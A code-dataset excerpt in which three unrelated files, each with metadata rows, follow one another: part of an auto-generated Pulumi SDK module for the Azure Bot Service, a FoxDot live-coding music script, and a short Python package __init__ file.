pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def sku(self) -> Optional[pulumi.Input[str]]:
"""
The SKU of the Azure Bot Service. Accepted values are `F0` or `S1`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "sku")
@sku.setter
def sku(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "sku", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags which should be assigned to this Azure Bot Service.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
class ServiceAzureBot(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
developer_app_insights_api_key: Optional[pulumi.Input[str]] = None,
developer_app_insights_application_id: Optional[pulumi.Input[str]] = None,
developer_app_insights_key: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
luis_app_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
luis_key: Optional[pulumi.Input[str]] = None,
microsoft_app_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages an Azure Bot Service.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_insights = azure.appinsights.Insights("exampleInsights",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
application_type="web")
example_api_key = azure.appinsights.ApiKey("exampleApiKey",
application_insights_id=example_insights.id,
read_permissions=[
"aggregate",
"api",
"draft",
"extendqueries",
"search",
])
example_service_azure_bot = azure.bot.ServiceAzureBot("exampleServiceAzureBot",
resource_group_name=example_resource_group.name,
location="global",
microsoft_app_id=data["azurerm_client_config"]["current"]["client_id"],
sku="F0",
endpoint="https://example.com",
developer_app_insights_api_key=example_api_key.api_key,
developer_app_insights_application_id=example_insights.app_id,
tags={
"environment": "test",
})
```
## Import
Azure Bot Services can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:bot/serviceAzureBot:ServiceAzureBot example /subscriptions/12345678-1234-9876-4563-123456789012/resourceGroups/resGroup1/providers/Microsoft.BotService/botServices/botService1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] developer_app_insights_api_key: The Application Insights Api Key to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_application_id: The resource ID of the Application Insights instance to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_key: The Application Insight Key to associate with this Azure Bot Service.
:param pulumi.Input[str] display_name: The name that the Azure Bot Service will be displayed as. This defaults to the value set for `name` if not specified.
:param pulumi.Input[str] endpoint: The Azure Bot Service endpoint.
:param pulumi.Input[str] location: The supported Azure location where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] luis_app_ids: A list of LUIS App IDs to associate with this Azure Bot Service.
:param pulumi.Input[str] luis_key: The LUIS key to associate with this Azure Bot Service.
:param pulumi.Input[str] microsoft_app_id: The Microsoft Application ID for the Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name which should be used for this Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] sku: The SKU of the Azure Bot Service. Accepted values are `F0` or `S1`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags which should be assigned to this Azure Bot Service.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ServiceAzureBotArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Azure Bot Service.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_insights = azure.appinsights.Insights("exampleInsights",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
application_type="web")
example_api_key = azure.appinsights.ApiKey("exampleApiKey",
application_insights_id=example_insights.id,
read_permissions=[
"aggregate",
"api",
"draft",
"extendqueries",
"search",
])
example_service_azure_bot = azure.bot.ServiceAzureBot("exampleServiceAzureBot",
resource_group_name=example_resource_group.name,
location="global",
microsoft_app_id=data["azurerm_client_config"]["current"]["client_id"],
sku="F0",
endpoint="https://example.com",
developer_app_insights_api_key=example_api_key.api_key,
developer_app_insights_application_id=example_insights.app_id,
tags={
"environment": "test",
})
```
## Import
Azure Bot Services can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:bot/serviceAzureBot:ServiceAzureBot example /subscriptions/12345678-1234-9876-4563-123456789012/resourceGroups/resGroup1/providers/Microsoft.BotService/botServices/botService1
```
:param str resource_name: The name of the resource.
:param ServiceAzureBotArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ServiceAzureBotArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
developer_app_insights_api_key: Optional[pulumi.Input[str]] = None,
developer_app_insights_application_id: Optional[pulumi.Input[str]] = None,
developer_app_insights_key: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
luis_app_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
luis_key: Optional[pulumi.Input[str]] = None,
microsoft_app_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ServiceAzureBotArgs.__new__(ServiceAzureBotArgs)
__props__.__dict__["developer_app_insights_api_key"] = developer_app_insights_api_key
__props__.__dict__["developer_app_insights_application_id"] = developer_app_insights_application_id
__props__.__dict__["developer_app_insights_key"] = developer_app_insights_key
__props__.__dict__["display_name"] = display_name
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["location"] = location
__props__.__dict__["luis_app_ids"] = luis_app_ids
__props__.__dict__["luis_key"] = luis_key
if microsoft_app_id is None and not opts.urn:
raise TypeError("Missing required property 'microsoft_app_id'")
__props__.__dict__["microsoft_app_id"] = microsoft_app_id
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if sku is None and not opts.urn:
raise TypeError("Missing required property 'sku'")
__props__.__dict__["sku"] = sku
__props__.__dict__["tags"] = tags
super(ServiceAzureBot, __self__).__init__(
'azure:bot/serviceAzureBot:ServiceAzureBot',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
developer_app_insights_api_key: Optional[pulumi.Input[str]] = None,
developer_app_insights_application_id: Optional[pulumi.Input[str]] = None,
developer_app_insights_key: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
endpoint: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
luis_app_ids: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
luis_key: Optional[pulumi.Input[str]] = None,
microsoft_app_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
sku: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None) -> 'ServiceAzureBot':
"""
Get an existing ServiceAzureBot resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] developer_app_insights_api_key: The Application Insights Api Key to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_application_id: The resource ID of the Application Insights instance to associate with this Azure Bot Service.
:param pulumi.Input[str] developer_app_insights_key: The Application Insight Key to associate with this Azure Bot Service.
:param pulumi.Input[str] display_name: The name that the Azure Bot Service will be displayed as. This defaults to the value set for `name` if not specified.
:param pulumi.Input[str] endpoint: The Azure Bot Service endpoint.
:param pulumi.Input[str] location: The supported Azure location where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] luis_app_ids: A list of LUIS App IDs to associate with this Azure Bot Service.
:param pulumi.Input[str] luis_key: The LUIS key to associate with this Azure Bot Service.
:param pulumi.Input[str] microsoft_app_id: The Microsoft Application ID for the Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name which should be used for this Azure Bot Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the Azure Bot Service should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] sku: The SKU of the Azure Bot Service. Accepted values are `F0` or `S1`. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags which should be assigned to this Azure Bot Service.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ServiceAzureBotState.__new__(_ServiceAzureBotState)
__props__.__dict__["developer_app_insights_api_key"] = developer_app_insights_api_key
__props__.__dict__["developer_app_insights_application_id"] = developer_app_insights_application_id
__props__.__dict__["developer_app_insights_key"] = developer_app_insights_key
__props__.__dict__["display_name"] = display_name
__props__.__dict__["endpoint"] = endpoint
__props__.__dict__["location"] = location
__props__.__dict__["luis_app_ids"] = luis_app_ids
__props__.__dict__["luis_key"] = luis_key
__props__.__dict__["microsoft_app_id"] = microsoft_app_id
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["sku"] = sku
__props__.__dict__["tags"] = tags
return ServiceAzureBot(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="developerAppInsightsApiKey")
def developer_app_insights_api_key(self) -> pulumi.Output[Optional[str]]:
"""
The Application Insights Api Key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_api_key")
@property
@pulumi.getter(name="developerAppInsightsApplicationId")
def developer_app_insights_application_id(self) -> pulumi.Output[Optional[str]]:
"""
The resource ID of the Application Insights instance to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_application_id")
@property
@pulumi.getter(name="developerAppInsightsKey")
def developer_app_insights_key(self) -> pulumi.Output[Optional[str]]:
"""
The Application Insight Key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "developer_app_insights_key")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
The name that the Azure Bot Service will be displayed as. This defaults to the value set for `name` if not specified.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def endpoint(self) -> pulumi.Output[Optional[str]]:
"""
The Azure Bot Service endpoint.
"""
return pulumi.get(self, "endpoint")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The supported Azure location where the Azure Bot Service should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="luisAppIds")
def luis_app_ids(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
A list of LUIS App IDs to associate with this Azure Bot Service.
"""
return pulumi.get(self, "luis_app_ids")
@property
@pulumi.getter(name="luisKey")
def luis_key(self) -> pulumi.Output[Optional[str]]:
"""
The LUIS key to associate with this Azure Bot Service.
"""
return pulumi.get(self, "luis_key")
@property
@pulumi.getter(name="microsoftAppId")
def microsoft_app_id(self) -> pulumi.Output[str]:
"""
The Microsoft Application ID for the Azure Bot Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "microsoft_app_id")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name which should be used for this Azure Bot Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group where the Azure Bot Service should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def sku(self) -> pulumi.Output[str]:
"""
The SKU of the Azure Bot Service. Accepted values are `F0` or `S1`. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "sku")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags which should be assigned to this Azure Bot Service.
"""
return pulumi.get(self, "tags")
| 48.708908
| 206
| 0.668427
| 4,858
| 38,821
| 5.108069
| 0.045492
| 0.088213
| 0.096474
| 0.07979
| 0.930445
| 0.922466
| 0.912311
| 0.902922
| 0.895789
| 0.879025
| 0
| 0.002871
| 0.237423
| 38,821
| 796
| 207
| 48.770101
| 0.83536
| 0.366554
| 0
| 0.823799
| 1
| 0
| 0.109868
| 0.050828
| 0
| 0
| 0
| 0
| 0
| 1
| 0.16476
| false
| 0.002288
| 0.011442
| 0
| 0.2746
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
adbad94dc805c53bc50b51e8480b61d4be6b09fd
| 9,129
|
py
|
Python
|
src/foxdot/research/ryan-kirkbride/180428_1750_weird_noises.py
|
Neko250/aisthesis
|
1d4a2c3070d10596c28b25ea2170523583e7eff0
|
[
"Apache-2.0"
] | 4
|
2018-06-29T18:39:34.000Z
|
2021-06-20T16:44:29.000Z
|
src/foxdot/research/ryan-kirkbride/180428_1750_weird_noises.py
|
Neko250/aisthesis
|
1d4a2c3070d10596c28b25ea2170523583e7eff0
|
[
"Apache-2.0"
] | null | null | null |
src/foxdot/research/ryan-kirkbride/180428_1750_weird_noises.py
|
Neko250/aisthesis
|
1d4a2c3070d10596c28b25ea2170523583e7eff0
|
[
"Apache-2.0"
] | null | null | null |
"""
Ryan Kirkbride - Love coding weird noises to dance to:
https://www.youtube.com/watch?v=Qc_8Pm2t-84
How to:
- Run the statements line by line (alt+enter),
go to the next one whenever you feel like
- The "#### > run block <" blocks should be
executed atomically (ctrl+enter)
- If you want to fast-forward through the song,
just execute the blocks atomically (ctrl+enter)
from the beginning, so you don't have to go
through every variation of each instrument
- Enjoy ! :+1:
"""
p1 >> pads(dur=8,) + (P*(0,4))
p1 >> pads(dur=8,) + (P*(0,4,4.5))
p1 >> pads(dur=8,) + (P*(0,4,4.5,3.5))
p1 >> pads(dur=8,) + (P*(0,4,4.5,2.5))
p1 >> pads(dur=8,) + (P*(0,4,4.5,0.5))
p1 >> pads(dur=8,room=1,) + (P*(0,4,4.5,0.5))
p1 >> pads(dur=8,room=1,chop=320) + (P*(0,4,4.5,0.5))
p1 >> pads(dur=8,room=1,chop=320,coarse=16) + (P*(0,4,4.5,0.5))
d1 >> play("x ",)
d2 >> play("[ii]", amp=linvar([0,1,0],[2,0]),)
d2 >> play("[ii]", amp=linvar([0,1,0],[2,0,2]),)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=4,)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=1,)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=1,crush=4,)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=2,crush=4,)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=2,crush=4,room=0.5,)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=2,crush=4,room=0.5,pan=[-1,1],)
d1 >> play("x-",)
d1 >> play("xn",)
d1 >> play("xn",sample=[0,PRand(5)],)
d1 >> play("xn",sample=[0,PRand(7)],)
d1 >> play("xn",sample=[0,PRand(7)],).every(6,"stutter",4,dur=3)
b1 >> bass(dur=8,)
b1 >> bass([0,0.5],dur=4,)
b1 >> bass([0,0.5],dur=4,oct=4,)
b1 >> bass([0,0.5],dur=4,oct=3,)
b1 >> bass([0,0.5],dur=4,oct=3,shape=1,)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=-1,)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3]),)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3]),coarse=16,)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3]),coarse=PRand([4,8,16]),)
d3 >> play(" u ")
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3,-4,2]),coarse=PRand([4,8,16]),)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3,-4,2]),coarse=PRand([4,8,16,32]),)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3,-4,2]),coarse=PRand([4,8,16,32,0]),)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3,-4,2]),coarse=PRand([4,8,16,32,0,64]),)
d3 >> play(Pvar([" u "," u u"],8),dur=PDur(var([4,5],8),8),)
d3 >> play(Pvar([" u "," u u"],8),dur=PDur(var([4,5],16),8),)
d1 >> play("xn",sample=[0,PRand(7)],).every(6,"stutter",4,dur=3).every(8,"amen")
Master().lpf = var([0,200],[28,4])
p1 >> pads(dur=8,room=1,chop=320,coarse=16) + (P*(0,4,4.5,[0.5,5]))
Root.default = var([0,2],64)
Master().lpf = var([0,100],[28,4])
Master().lpf = var([0,1000],[28,4])
Master().lpr = linvar([0.1,1])
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3,-4,2]),coarse=PRand([4,8,16,32,0,64,13]),)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3,-4,2]),coarse=PRand([4,8,16,32,0,64])*PRand([1,1.5]),)
c1 >> play("#",dur=8,)
c1 >> play("#",dur=8,bits=4,)
c1 >> play("#",dur=8,bits=4,cut=1/2,)
c1 >> play("#",dur=8,bits=4,cut=1/2,room=1,)
c1 >> play("#",dur=8,bits=4,cut=1/4,room=1,)
c1 >> play("#",dur=8,bits=4,cut=1/4,room=1,crush=1,)
c1 >> play("#",dur=8,bits=4,cut=1/4,room=1,crush=1,shape=0.5,)
c1 >> play("#",dur=8,bits=4,cut=1/4,room=1,crush=1,shape=0.5,pan=[-1,1],)
c1 >> play("#",dur=8,bits=4,cut=1/4,room=1,crush=1,shape=0.5,pan=[-1,1],slide=-1,)
c1 >> play("#",dur=P[8:12],bits=4,cut=1/4,room=1,crush=1,shape=0.5,pan=[-1,1],slide=-1,)
c1.solo()
c1 >> play("#",dur=P[8:12],bits=4,cut=1/4,room=1,crush=8,shape=0.5,pan=[-1,1],slide=-1,chop=320,)
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=2,crush=4,room=0.5,pan=[-1,1],)
d1 >> play("xn",sample=[0,PRand(7)],).every(6,"stutter",4,dur=3).every(8,"amen")
c1 >> play("#",dur=P[8:12],bits=4,cut=1/4,room=1,crush=8,shape=0.5,pan=[-1,1],slide=-1,chop=320,rate=2,)
c1 >> play("#",dur=P[8:12],bits=4,cut=1/4,room=1,crush=8,shape=0.5,pan=[-1,1],slide=-1,chop=320,rate=PRand(8),)
b1 >> bass([0,0.5],dur=4,oct=3,shape=2,slide=PRand([-1,0,-2,-3,-4,2]),coarse=PRand([4,8,16,32,0,64])*PRand([1,1.5]),)
d3 >> play(Pvar([" u "," u u"],8),dur=PDur(var([4,5],16),8),)
p1 >> pads(dur=8,room=1,chop=320,coarse=16) + (P*(0,4,4.5,[0.5,5]))
c1 >> play("#",dur=P[8:12],bits=4,cut=1/4,room=1,crush=8,shape=0.5,pan=[-1,1],slide=-1,chop=320,rate=PRand(8)*10,)
c1 >> play("#",dur=P[8:12],bits=4,cut=1/4,room=1,crush=8,shape=0.5,pan=[-1,1],slide=-1,chop=320,rate=PRand(8)+10,)
s1 >> saw(PWhite(32),dur=1/4,)
s1 >> saw(PWhite(32),dur=1/6,)
s1 >> pulse(PWhite(32),dur=1/6,)
s1 >> pulse(PWhite(32),dur=1/6,fmod=10,)
s1 >> pulse(PWhite(32),dur=1/6,fmod=10,oct=4,)
Group(s1, b1).only()
s1 >> pulse(PWhite(32)[:8],dur=1/4,fmod=10,oct=4,)
d4 >> play("funky",rate=10,)
d4 >> play("funky",rate=10,dur=1/4,)
d4 >> play("funky",rate=4,dur=1/4,)
d4 >> play("funky",rate=4*PRand([1,1.5]),dur=1/4,)
d4 >> play("funky",rate=4*PRand([1,1.5,1.25]),dur=1/4,)
d4 >> play("funky",rate=4*PRand([1,1.5,1.25]),dur=1/4,pan=PStep(6,P*(-1,1)),)
#### > run block <
d1 >> play("xn",sample=[0,PRand(7)],).every(6,"stutter",4,dur=3).every(8,"amen")
d2 >> play("[oo]", amp=linvar([0,1,0],[2,0,2]),bits=4,rate=2,crush=4,room=0.5,pan=[-1,1],)
d3 >> play(Pvar([" u "," u u"],8),dur=PDur(var([4,5],16),8),)
b1.stop()
#### > run block <
s1 >> pulse(PWhite(32)[:8],dur=1/4,fmod=10,oct=3,)
s1 >> pulse(PWhite(32)[:8],dur=1/4,fmod=10,oct=3,) + var([0,(0,4)],[12,4])
s1 >> pulse(PWhite(32)[:8],dur=1/4,fmod=10,oct=4,) + var([0,(0,4)],[12,4])
Root.default = 0
c1 >> play("#",dur=P[8:12],bits=4,cut=1/4,room=1,crush=8,shape=0.5,pan=[-1,1],slide=-1,chop=320,rate=PRand(8)+10,)
d4 >> play("<funky>< m>",rate=4*PRand([1,1.5,1.25]),dur=1/4,pan=PStep(6,P*(-1,1)),)
d4 >> play("<funky>< w>",rate=4*PRand([1,1.5,1.25]),dur=1/4,pan=PStep(6,P*(-1,1)),)
d4 >> play("<funky>< (mw)l>",rate=4*PRand([1,1.5,1.25]),dur=1/4,pan=PStep(6,P*(-1,1)),)
d4 >> play("<funky>< (ew)l>",rate=4*PRand([1,1.5,1.25]),dur=1/4,pan=PStep(6,P*(-1,1)),)
d4 >> play("<funky>< (+t)l>",rate=4*PRand([1,1.5,1.25]),dur=1/4,pan=PStep(6,P*(-1,1)),)
d4 >> play("<funky>< (+q)l>",rate=4*PRand([1,1.5,1.25]),dur=1/4,pan=PStep(6,P*(-1,1)),)
p1 >> pads(dur=8,room=1,chop=320,coarse=16) + (P*(0,4,4.5,[0.5,5]))
s1.every(8,"degrade")
s1.stop()
d3 >> play("*",sample=2,dur=1/4,amp=PRand(2)[:16],)
d3 >> play("*",sample=2,dur=1/4,amp=PRand(2)[:16],pan=[-1,1],)
d3 >> play("*",sample=2,dur=1/4,amp=PRand(2)[:16],pan=[-1,0,1],)
d3 >> play("*",sample=2,dur=1/4,amp=PRand(2)[:16],pan=[-1,0,1],rate=var([1,2]))
d1 >> play("Vn",sample=[0,PRand(7)],).every(6,"stutter",4,dur=3).every(8,"amen")
d1 >> play("<Vn>< u >",sample=[0,PRand(7)],).every(6,"stutter",4,dur=3).every(8,"amen")
p1 >> pads(dur=8,room=1,chop=320,coarse=16,lpf=linvar([500,1000],24),) + (P*(0,4,4.5,[0.5,5]))
p1 >> pads(dur=8,room=1,chop=320,coarse=16,lpf=linvar([500,1000],24),lpr=linvar([0.1,1],14),) + (P*(0,4,4.5,[0.5,5]))
p1 >> pads(dur=8,room=1,chop=320,coarse=16,lpf=linvar([500,800],24),lpr=linvar([0.1,1],14),) + (P*(0,4,4.5,[0.5,5]))
p1 >> pads(dur=8,room=1,chop=320,coarse=16,lpf=linvar([400,800],24),lpr=linvar([0.1,1],14),) + (P*(0,4,4.5,[0.5,5]))
p1 >> pluck(dur=8,room=1,chop=320,coarse=16,lpf=linvar([400,800],24),lpr=linvar([0.1,1],14),) + (P*(0,4,4.5,[0.5,5]))
d_all.amplify = var([1,0],[28,4])
p2 >> blip(dur=12,)
p2 >> blip(dur=12,fmod=10,)
p2 >> blip(dur=12,fmod=4,)
p2 >> blip(dur=12,fmod=4,vib=12,)
p2 >> blip(dur=12,fmod=4,vib=12,slide=-1,oct=7,)
p2 >> blip(dur=12,fmod=4,vib=12,slide=-1,oct=7,pan=P*(-1,0,1),)
p2 >> blip(dur=12,fmod=4,vib=12,slide=-1,oct=7,pan=P+(-1,0,1),sus=4,)
p2 >> blip(dur=12,fmod=4,vib=12,slide=-1,oct=7,pan=P+(-1,0,1),sus=4,bits=8,crush=8,)
p2 >> blip(dur=12,fmod=4,vib=12,slide=-1,oct=7,pan=P+(-1,0,1),sus=4,bits=8,crush=8,) + (0,9)
p2 >> blip(dur=12,fmod=4,vib=12,slide=-1,oct=7,pan=P+(-1,0,1),sus=4,bits=8,crush=8,) + (0,2)
d_all.stop()
# p2 >> blip(dur=12,fmod=4,vib=12,slide=(-1,-2,-3),oct=7,pan=P+(-1,0,1),sus=4,bits=8,crush=8,) + (0,2)
# p2 >> blip(dur=12,fmod=4,vib=12,slide=-1,oct=7,pan=P+(-1,0,1),sus=4,bits=8,crush=8,) + (0,2)
# DefaultServer.freeAllNodes()
d1 >> play("n",dur=1/4,sample=PRand(7),)
d1 >> play("n",dur=1/4,sample=PRand(7),pan=PWhite(-1,1),)
d1 >> play("n",dur=1/4,sample=PRand(7)+PStep(7,P*(0,1)),pan=PWhite(-1,1),)
d2 >> play("(X )( X)O ",)
d2 >> play("(X )( X)O ",rate=(0.9,1),pan=(-1,1),)
d2 >> play("(X )( X)O ",rate=(0.9,1),pan=(-1,1),).every(6,"stutter")
d2 >> play("(X )( X)O ",rate=(0.9,1),pan=(-1,1),).every(6,"stutter",n=4,dur=3)
d2 >> play("<s><(X )( X)O >",rate=(0.9,1),pan=(-1,1),).every(6,"stutter",n=4,dur=3)
d2 >> play("< s><(X )( X)O >",rate=(0.9,1),pan=(-1,1),).every(6,"stutter",n=4,dur=3)
d_all.lpf = 500
d_all.lpf = 0
d3 >> play("[oo]",amp=linvar([0,1],[32,0]),)
d4 >> play("#",dur=32,)
nextBar(Clock.clear())
| 44.315534
| 117
| 0.56326
| 2,132
| 9,129
| 2.409475
| 0.076454
| 0.016741
| 0.022387
| 0.024917
| 0.857115
| 0.84232
| 0.818182
| 0.809422
| 0.802803
| 0.761145
| 0
| 0.160674
| 0.076898
| 9,129
| 205
| 118
| 44.531707
| 0.448914
| 0.080294
| 0
| 0.129496
| 0
| 0
| 0.051712
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
bc2100eb8f2f2b395cb3343c8b2aba045380fbe2
| 146
|
py
|
Python
|
sel_map_segmentation/sel_map_segmentation/src/sel_map_segmentation/__init__.py
|
roahmlab/sel_map
|
51c5ac738eb7475f409f826c0d30f555f98757b3
|
[
"MIT"
] | 2
|
2022-02-24T21:10:32.000Z
|
2022-03-11T20:00:09.000Z
|
sel_map_segmentation/sel_map_segmentation/src/sel_map_segmentation/__init__.py
|
roahmlab/sel_map
|
51c5ac738eb7475f409f826c0d30f555f98757b3
|
[
"MIT"
] | null | null | null |
sel_map_segmentation/sel_map_segmentation/src/sel_map_segmentation/__init__.py
|
roahmlab/sel_map
|
51c5ac738eb7475f409f826c0d30f555f98757b3
|
[
"MIT"
] | null | null | null |
from .cameraSensor import CameraSensor
from .cameraSensor import Pose
from .BypassWrapper import BypassWrapper
from .ColorScale import ColorScale
| 29.2
| 40
| 0.863014
| 16
| 146
| 7.875
| 0.375
| 0.253968
| 0.349206
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.109589
| 146
| 4
| 41
| 36.5
| 0.969231
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.25
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
